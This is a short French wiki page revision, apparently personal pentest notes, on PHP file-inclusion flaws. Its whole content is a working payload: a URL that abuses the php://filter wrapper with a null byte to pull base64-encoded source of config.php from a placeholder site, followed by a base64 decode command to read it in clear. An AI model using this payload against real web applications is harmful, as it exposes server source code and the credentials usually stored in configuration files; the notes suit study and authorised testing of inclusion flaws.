« 1.8 Failles include » : différence entre les versions
Aller à la navigation
Aller à la recherche
Aucun résumé des modifications |
(Aucune différence)
|
Version du 20 juillet 2015 à 08:17
Lire un script PHP à la volé mettre dans l'include:
http://www.pwnsite.com/index.php?page=php://filter/convert.base64-encode/resource=config.php%00
Reste plus qu'à le décoder pour avoir la page en clair
echo "cHJvdXQ=" | base64 -d